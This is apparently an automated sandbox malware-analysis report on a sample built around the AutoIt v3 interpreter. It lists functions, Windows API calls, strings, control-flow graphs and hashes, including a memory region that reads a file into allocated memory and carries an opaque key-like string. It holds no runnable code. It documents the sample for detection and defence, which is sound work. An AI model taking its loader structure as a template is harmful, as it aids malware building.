                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: de62fb3100d012f121fc7972fc712104afc0f8b12f8a9bc188d942165b8f4352
                                                    • Instruction ID: de9d34a91cd6af462e7712e0947f3f9ec0e46ec1b328a5b327bc241f83e2c713
                                                    • Opcode Fuzzy Hash: de62fb3100d012f121fc7972fc712104afc0f8b12f8a9bc188d942165b8f4352
                                                    • Instruction Fuzzy Hash: 353149B1841349AFEB008FA4EC88AD9BBF2FF09310F14566AF551EA2A1D3B64541CF64
                                                    Function 00603041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                    • RegisterClassExW.USER32(00000030), ref: 0060309E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                    • LoadIconW.USER32(000000A9), ref: 006030F2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: d38f35452ef16f3b72429268b9f9eb14e6f3ba84b11ada819bd755565aab73cd
                                                    • Instruction ID: 79da3579c5842c31ec2686ea49e1f97a22c1296b1e732415914909e69068dcfb
                                                    • Opcode Fuzzy Hash: d38f35452ef16f3b72429268b9f9eb14e6f3ba84b11ada819bd755565aab73cd
                                                    • Instruction Fuzzy Hash: E021C7B1951218EFEB00DFA4EC49B9DBBF6FB08710F10522AF511A62A0D7B545448FA5
                                                    Function 006071EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00604864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006C62F8,?,006037C0,?), ref: 00604882
                                                      • Part of subcall function 0062074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,006072C5), ref: 00620771
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00607308
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0063ECF1
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0063ED32
                                                    • RegCloseKey.ADVAPI32(?), ref: 0063ED70
                                                    • _wcscat.LIBCMT ref: 0063EDC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 2673923337-2727554177
                                                    • Opcode ID: c43b447d01451611c08c1d80dc78be057e49e280c8d2b820b474b41c019fff61
                                                    • Instruction ID: bb8615330ef18219441863b33b013aa717aed1d79261efa68bfc34b3900cfccc
                                                    • Opcode Fuzzy Hash: c43b447d01451611c08c1d80dc78be057e49e280c8d2b820b474b41c019fff61
                                                    • Instruction Fuzzy Hash: D7718E714483019EC718EF25EC81DABBBEAFF58350F40552EF455872A0EB319A48CFA6
                                                    Function 00603633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 760 603633-603681 762 6036e1-6036e3 760->762 763 603683-603686 760->763 762->763 764 6036e5 762->764 765 6036e7 763->765 766 603688-60368f 763->766 767 6036ca-6036d2 DefWindowProcW 764->767 768 6036ed-6036f0 765->768 769 63d31c-63d34a call 6111d0 call 6111f3 765->769 770 603695-60369a 766->770 771 60375d-603765 PostQuitMessage 766->771 775 6036d8-6036de 767->775 777 6036f2-6036f3 768->777 778 603715-60373c SetTimer RegisterWindowMessageW 768->778 804 63d34f-63d356 769->804 772 6036a0-6036a2 770->772 773 63d38f-63d3a3 call 662a16 770->773 776 603711-603713 771->776 779 603767-603776 call 604531 772->779 780 6036a8-6036ad 772->780 773->776 796 63d3a9 773->796 776->775 784 6036f9-60370c KillTimer call 6044cb call 603114 777->784 785 63d2bf-63d2c2 777->785 778->776 781 60373e-603749 CreatePopupMenu 778->781 779->776 786 6036b3-6036b8 780->786 787 63d374-63d37b 780->787 781->776 784->776 791 63d2c4-63d2c6 785->791 792 63d2f8-63d317 MoveWindow 785->792 794 60374b-60375b call 6045df 786->794 795 6036be-6036c4 786->795 787->767 802 63d381-63d38a call 65817e 787->802 799 63d2e7-63d2f3 SetFocus 791->799 800 63d2c8-63d2cb 791->800 792->776 794->776 795->767 795->804 796->767 799->776 800->795 805 63d2d1-63d2e2 call 6111d0 800->805 802->767 804->767 810 63d35c-63d36f call 6044cb call 6043db 804->810 805->776 810->767
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 006036D2
                                                    • KillTimer.USER32(?,00000001), ref: 006036FC
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0060371F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0060372A
                                                    • CreatePopupMenu.USER32 ref: 0060373E
                                                    • PostQuitMessage.USER32(00000000), ref: 0060375F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated$%i
                                                    • API String ID: 129472671-2085807306
                                                    • Opcode ID: e648a4240b1b6bc026b692b9b3e453b30a62b0487c1b90e952f2ad208eab3a87
                                                    • Instruction ID: a1314d980cc92298804914f713a0dd9bc960dbee0cb0d64bc001bc1b9ff5432a
                                                    • Opcode Fuzzy Hash: e648a4240b1b6bc026b692b9b3e453b30a62b0487c1b90e952f2ad208eab3a87
                                                    • Instruction Fuzzy Hash: 204138B2190115BBEF2C5F68EC09FBB375FE704302F14062DF602863E1CAA69E419369
                                                    Function 00603A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00603A62
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00603A71
                                                    • LoadIconW.USER32(00000063), ref: 00603A88
                                                    • LoadIconW.USER32(000000A4), ref: 00603A9A
                                                    • LoadIconW.USER32(000000A2), ref: 00603AAC
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00603AD2
                                                    • RegisterClassExW.USER32(?), ref: 00603B28
                                                      • Part of subcall function 00603041: GetSysColorBrush.USER32(0000000F), ref: 00603074
                                                      • Part of subcall function 00603041: RegisterClassExW.USER32(00000030), ref: 0060309E
                                                      • Part of subcall function 00603041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006030AF
                                                      • Part of subcall function 00603041: InitCommonControlsEx.COMCTL32(?), ref: 006030CC
                                                      • Part of subcall function 00603041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006030DC
                                                      • Part of subcall function 00603041: LoadIconW.USER32(000000A9), ref: 006030F2
                                                      • Part of subcall function 00603041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00603101
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: f9286c43ca4890681400bfda1c078ef2f43e378595f676c573fadfb72756bf1f
                                                    • Instruction ID: cd9bfa6ae38986270c0293badb9f204d967313780939add43b7b90bb4487e04e
                                                    • Opcode Fuzzy Hash: f9286c43ca4890681400bfda1c078ef2f43e378595f676c573fadfb72756bf1f
                                                    • Instruction Fuzzy Hash: C7212E71D41304BFEB109FA4EC09FAD7FB6FB08711F105129F505A62A0D7BA56548F98
                                                    Function 00603778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$bl
                                                    • API String ID: 1825951767-245244940
                                                    • Opcode ID: afb52555122d7ea4629ee311205be1f232006cbc5d1c9a82945b4ce9d94be7b4
                                                    • Instruction ID: e2e2c372bdad9c454fb597907ac9fa949ab430ce8b60552cdf43154f4f1639f2
                                                    • Opcode Fuzzy Hash: afb52555122d7ea4629ee311205be1f232006cbc5d1c9a82945b4ce9d94be7b4
                                                    • Instruction Fuzzy Hash: 7EA13D719502299ACB48EBA4DC95EEFB77EBF14300F00052EF512A72D1EF745A09CBA4
                                                    Function 0060F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006203D3
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 006203DB
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006203E6
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006203F1
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 006203F9
                                                      • Part of subcall function 006203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00620401
                                                      • Part of subcall function 00616259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0060FA90), ref: 006162B4
                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0060FB2D
                                                    • OleInitialize.OLE32(00000000), ref: 0060FBAA
                                                    • CloseHandle.KERNEL32(00000000), ref: 006449F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                    • String ID: <gl$\dl$%i$cl
                                                    • API String ID: 1986988660-2485871852
                                                    • Opcode ID: c08b54d01595dbbd0b70e7a7e0e2e6a0d3136ab8547f373d24651975795e6a52
                                                    • Instruction ID: cfb074fda6174c6f87b7da7ea6909ab6367b41a18e52e55f0c531b7d83a47680
                                                    • Opcode Fuzzy Hash: c08b54d01595dbbd0b70e7a7e0e2e6a0d3136ab8547f373d24651975795e6a52
                                                    • Instruction Fuzzy Hash: 958199B09012808EC788EF29E955E757BE7EB98309720E53EF419C7262EB758405CF6D
                                                    Function 03942600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 993 3942600-39426ae call 3940000 996 39426b5-39426db call 3943510 CreateFileW 993->996 999 39426e2-39426f2 996->999 1000 39426dd 996->1000 1008 39426f4 999->1008 1009 39426f9-3942713 VirtualAlloc 999->1009 1001 394282d-3942831 1000->1001 1002 3942873-3942876 1001->1002 1003 3942833-3942837 1001->1003 1005 3942879-3942880 1002->1005 1006 3942843-3942847 1003->1006 1007 3942839-394283c 1003->1007 1010 39428d5-39428ea 1005->1010 1011 3942882-394288d 1005->1011 1012 3942857-394285b 1006->1012 1013 3942849-3942853 1006->1013 1007->1006 1008->1001 1014 3942715 1009->1014 1015 394271a-3942731 ReadFile 1009->1015 1020 39428ec-39428f7 VirtualFree 1010->1020 1021 39428fa-3942902 1010->1021 1018 3942891-394289d 1011->1018 1019 394288f 1011->1019 1022 394285d-3942867 1012->1022 1023 394286b 1012->1023 1013->1012 1014->1001 1016 3942733 1015->1016 1017 3942738-3942778 VirtualAlloc 1015->1017 1016->1001 1024 394277f-394279a call 3943760 1017->1024 1025 394277a 1017->1025 1026 39428b1-39428bd 1018->1026 1027 394289f-39428af 1018->1027 1019->1010 1020->1021 1022->1023 1023->1002 1033 39427a5-39427af 1024->1033 1025->1001 1030 39428bf-39428c8 1026->1030 1031 39428ca-39428d0 1026->1031 1029 39428d3 1027->1029 1029->1005 1030->1029 1031->1029 1034 39427b1-39427e0 call 3943760 1033->1034 1035 39427e2-39427f6 call 3943570 1033->1035 1034->1033 1041 39427f8 1035->1041 1042 39427fa-39427fe 1035->1042 1041->1001 1043 3942800-3942804 FindCloseChangeNotification 1042->1043 1044 394280a-394280e 1042->1044 1043->1044 1045 3942810-394281b VirtualFree 1044->1045 1046 394281e-3942827 1044->1046 1045->1046 1046->996 1046->1001
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 039426D1
                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 039428F7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateFileFreeVirtual
                                                    • String ID:
                                                    • API String ID: 204039940-0
                                                    • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                    • Instruction ID: c5ca164de009036473f97baf54a56511567ffdcba3a21160eee08b30168d6e3a
                                                    • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                    • Instruction Fuzzy Hash: 5AA1F874E00209EBDB14CFA4C994FEEBBB5FF48304F248959E545BB280D7759A81CB94
                                                    Function 006039E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1114 6039e7-603a57 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00603A15
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603A36
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00603A4A
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00603A53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 668ce5fe46c3ae61167fd53e1aba6623d3030a44e06fb9924294746c96e26c77
                                                    • Instruction ID: 98212ada01ed2035b844a1a217ea2229817d10e1c2a6d64f220c9e6af7f53a54
                                                    • Opcode Fuzzy Hash: 668ce5fe46c3ae61167fd53e1aba6623d3030a44e06fb9924294746c96e26c77
                                                    • Instruction Fuzzy Hash: 5EF03A70600290BEEB301B23EC48E373E7FD7C6F50B00112AB900A2171C2BA0841CAB8
                                                    Function 039423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1115 39423b0-39424fd call 3940000 call 39422a0 CreateFileW 1122 3942504-3942514 1115->1122 1123 39424ff 1115->1123 1126 3942516 1122->1126 1127 394251b-3942535 VirtualAlloc 1122->1127 1124 39425b4-39425b9 1123->1124 1126->1124 1128 3942537 1127->1128 1129 3942539-3942550 ReadFile 1127->1129 1128->1124 1130 3942554-394258e call 39422e0 call 39412a0 1129->1130 1131 3942552 1129->1131 1136 3942590-39425a5 call 3942330 1130->1136 1137 39425aa-39425b2 ExitProcess 1130->1137 1131->1124 1136->1137 1137->1124
                                                    APIs
                                                      • Part of subcall function 039422A0: Sleep.KERNELBASE(000001F4), ref: 039422B1
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 039424F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: KHJX5G364S2SZ0OFU8AP9A1I7LV23
                                                    • API String ID: 2694422964-588014373
                                                    • Opcode ID: f7f3e73d0b34ea3a4fea421243b8ddf7416bf1e50123643d03cac27a8f1533de
                                                    • Instruction ID: acbb289be5b4666f02b43ae366b128df427afafcd2359686d1b28361ae7996e5
                                                    • Opcode Fuzzy Hash: f7f3e73d0b34ea3a4fea421243b8ddf7416bf1e50123643d03cac27a8f1533de
                                                    • Instruction Fuzzy Hash: 29618270D04288DAEF11DBF4C854BDEBBB8AF15304F044599E6487B2C1D7BA0B49CBA6
                                                    Function 0060410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1139 60410d-604123 1140 604200-604204 1139->1140 1141 604129-60413e call 607b76 1139->1141 1144 604144-604164 call 607d2c 1141->1144 1145 63d5dd-63d5ec LoadStringW 1141->1145 1148 63d5f7-63d60f call 607c8e call 607143 1144->1148 1149 60416a-60416e 1144->1149 1145->1148 1158 60417e-6041fb call 623020 call 60463e call 622ffc Shell_NotifyIconW call 605a64 1148->1158 1161 63d615-63d633 call 607e0b call 607143 call 607e0b 1148->1161 1151 604174-604179 call 607c8e 1149->1151 1152 604205-60420e call 6081a7 1149->1152 1151->1158 1152->1158 1158->1140 1161->1158
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0063D5EC
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • _memset.LIBCMT ref: 0060418D
                                                    • _wcscpy.LIBCMT ref: 006041E1
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006041F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 2f1010b30a3a2c96cbdea9c375a828adebbe1f11abcbaf5699a61bbb11e6a4c4
                                                    • Instruction ID: 3826cb3ed91999bfadb46615d0ec5e8fc725d41eb178e80c69a747585e11fc1b
                                                    • Opcode Fuzzy Hash: 2f1010b30a3a2c96cbdea9c375a828adebbe1f11abcbaf5699a61bbb11e6a4c4
                                                    • Instruction Fuzzy Hash: AC31F3B1448304AAD779EB60DC45FEB73EAAF44300F10451EF184921E1EF74A748CB9A
                                                    Function 0062564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                    • Instruction ID: 8c02ecb1e1abe4b69e5a682e2c1a4dd4321a184b339515645c47cd9d38132860
                                                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                    • Instruction Fuzzy Hash: 1B519030A01F25DBDB348FA9A8846AE77A7AF40320F248629F826962E0D7709D558F54
                                                    Function 006069CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00604F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604F6F
                                                    • _free.LIBCMT ref: 0063E68C
                                                    • _free.LIBCMT ref: 0063E6D3
                                                      • Part of subcall function 00606BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606D0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 2861923089-1757145024
                                                    • Opcode ID: 6b03b7f2b97d933b43cb383d224831eea6b4668af8839749f98b7b58078953ec
                                                    • Instruction ID: c11763d3a22269e612bae641be7da0eaf4433e4c0bbad25662d40bceb25a5297
